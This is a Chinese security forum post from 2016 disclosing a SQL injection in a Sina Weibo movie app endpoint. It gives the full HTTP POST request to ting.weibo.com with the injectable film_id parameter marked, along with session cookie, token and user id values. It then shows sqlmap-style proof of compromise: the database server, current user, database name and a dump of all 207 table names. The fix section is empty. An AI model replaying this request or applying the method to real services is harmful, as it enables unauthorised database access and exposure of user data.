HanDs
管理员

[7月漏洞公开] 新浪微博另一处SQL注入漏洞 



滴,穴深卡。周芷若已哭晕在厕所。

详细说明:

code 区域
POST http://ting.weibo.com/movieapp/dialogue/show HTTP/1.1
Host: ting.weibo.com
Accept: application/json
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Proxy-Connection: keep-alive
Cookie: TING-G0-YF=61cb3ab25b54439455665d34a539fe7d; ua=01ApXxYxOf5lUqITxkskwioISGPlqMsCLL9GcfVT8tIX1QLeA.__iPhone 6__os9.3.1__1.4.0
User-Agent: WeiboMovie/1.4.0 (iPhone; iOS 9.3.1; Scale/2.00)
Accept-Language: zh-Hans-US;q=1, en-US;q=0.9
Accept-Encoding: gzip, deflate
Content-Length: 231

action=dialogue%2Fshow&aid=01ApXxYxOf5lUqITxkskwioISGPlqMsCLL9GcfVT8tIX1QLeA.&d_n=iPhone%206&film_id=178868*&from=8614093010&ip=100.77.76.179&os_n=iOS&os_v=9.3.1&token=2.00ddC5ZDcX6kGDfeab6c3adc0VbshD&uid=3271300273&v=1.4.0&wm=44995



参数film_id

漏洞证明:

back-end DBMS: MySQL 5

current user: '[email protected]%'

current database: 'musiclib'

code 区域
back-end DBMS: MySQL 5
Database: musiclib
[207 tables]
+---------------------------------------+
| artist_match_name |
| cinema_area |
| cinema_baseinfo |
| cinema_screenings |
| cinema_tag |
| cinema_tag_mapcheck |
| firehose_info |
| mingxing_activity |
| mingxing_userflower |
| movie_action_count_score |
| movie_admin_page |
| movie_answers |
| movie_app_ad |
| movie_app_push_task |
| movie_app_realtime_push |
| movie_app_user |
| movie_app_user_token |
| movie_article |
| movie_artist |
| movie_box_office |
| movie_box_office_poll |
| movie_convert_callback |
| movie_coupon |
| movie_coupon_backup |
| movie_customize |
| movie_dialogue |
| movie_dialogue_pic |
| movie_dictionary |
| movie_emotion |
| movie_event_schedule |
| movie_film |
| movie_film_old |
| movie_film_promote |
| movie_filmtopic |
| movie_focus |
| movie_foreign_comment |
| movie_friendfeed |
| movie_game_rank |
| movie_game_seek_reply |
| movie_game_tools |
| movie_gewala_buy |
| movie_group_comment_report |
| movie_group_user |
| movie_hashdata |
| movie_hottopic |
| movie_nativebanner |
| movie_newsinfo |
| movie_object_relation |
| movie_pagepoll |
| movie_photo |
| movie_place_sale |
| movie_poll_daily_detail |
| movie_poll_detail |
| movie_poll_detail_hot |
| movie_poll_manul |
| movie_proterty |
| movie_push_map |
| movie_question_type |
| movie_questions |
| movie_relation |
| movie_relation_page |
| movie_tag_map |
| movie_ticket |
| movie_user_still |
| movie_video |
| movieapp_photo |
| open_api_info |
| open_api_tree |
| open_group |
| open_group_api_map |
| open_user |
| raw_album |
| raw_cinema_mapcheck |
| raw_map_check |
| raw_map_musician |
| raw_movie |
| raw_movie_artist_map |
| raw_movie_douban_pic |
| raw_movie_map |
| raw_mv |
| raw_mv_recommend |
| raw_podcast |
| raw_podcast_column |
| raw_podcast_map |
| raw_podcast_program |
| raw_singer |
| raw_song |
| raw_song_0 |
| raw_song_1 |
| raw_song_10 |
| raw_song_11 |
| raw_song_12 |
| raw_song_13 |
| raw_song_14 |
| raw_song_15 |
| raw_song_16 |
| raw_song_17 |
| raw_song_18 |
| raw_song_19 |
| raw_song_2 |
| raw_song_20 |
| raw_song_21 |
| raw_song_22 |
| raw_song_23 |
| raw_song_3 |
| raw_song_4 |
| raw_song_5 |
| raw_song_6 |
| raw_song_7 |
| raw_song_8 |
| raw_song_9 |
| raw_song_match |
| raw_source |
| res_ad |
| res_album |
| res_album_song_map |
| res_artist |
| res_artist_album_map |
| res_artist_song_map |
| res_asiapoll_blacklist |
| res_band |
| res_card_info |
| res_celebrity_songlist |
| res_chinasong_manul |
| res_comm_item |
| res_common_banner |
| res_copyright |
| res_copyright_album_map |
| res_copyright_artist_map |
| res_copyright_song_map |
| res_country |
| res_coupon_a |
| res_famous_songlist |
| res_feedback |
| res_film_bonus |
| res_film_coupon |
| res_focus |
| res_friendfeed |
| res_hashdata |
| res_hotweibo |
| res_hotweibo_new |
| res_interface_test |
| res_keyword_queue |
| res_language |
| res_language_album_map |
| res_language_artist_map |
| res_language_song_map |
| res_log |
| res_lyric |
| res_merge_log |
| res_music_style |
| res_musician_group |
| res_musician_page |
| res_musicstyle_album_map |
| res_musicstyle_artist_map |
| res_musicstyle_song_map |
| res_musictopic |
| res_nativebanner |
| res_object_creator_mblog |
| res_page_layout |
| res_page_render_map |
| res_page_rule_set |
| res_pagepoll |
| res_party_song |
| res_party_user_action |
| res_party_user_video |
| res_relation_store |
| res_reservation |
| res_right_card_map |
| res_right_card_model |
| res_s3_log |
| res_search_watch |
| res_share_text_map |
| res_song |
| res_song_audio |
| res_song_countinfo |
| res_song_ext |
| res_song_outter_00 |
| res_song_outter_01 |
| res_song_outter_02 |
| res_song_outter_03 |
| res_song_outter_04 |
| res_song_outter_05 |
| res_song_outter_06 |
| res_song_outter_07 |
| res_song_outter_08 |
| res_song_outter_09 |
| res_song_outter_0a |
| res_song_outter_0b |
| res_song_outter_0c |
| res_song_outter_0d |
| res_song_outter_0e |
| res_song_outter_0f |
| res_song_ringtone |
| res_songautopush_event |
| res_square_point_uid |
| res_timing_job |
| res_topic_monitor |
| res_uidlist |
| res_update_film |
| res_update_song |
| res_user |
| res_user_rate |
| res_usergroup |
| song_match_name |
| song_mv_map |
| xunlongjue_message |
+---------------------------------------+

Database: information_schema
[37 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+

修复方案:

NULL


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
新浪 宋⒉┝
#1楼
发帖时间:2016-7-11   |   查看数:0   |   回复数:0
游客组
快速回复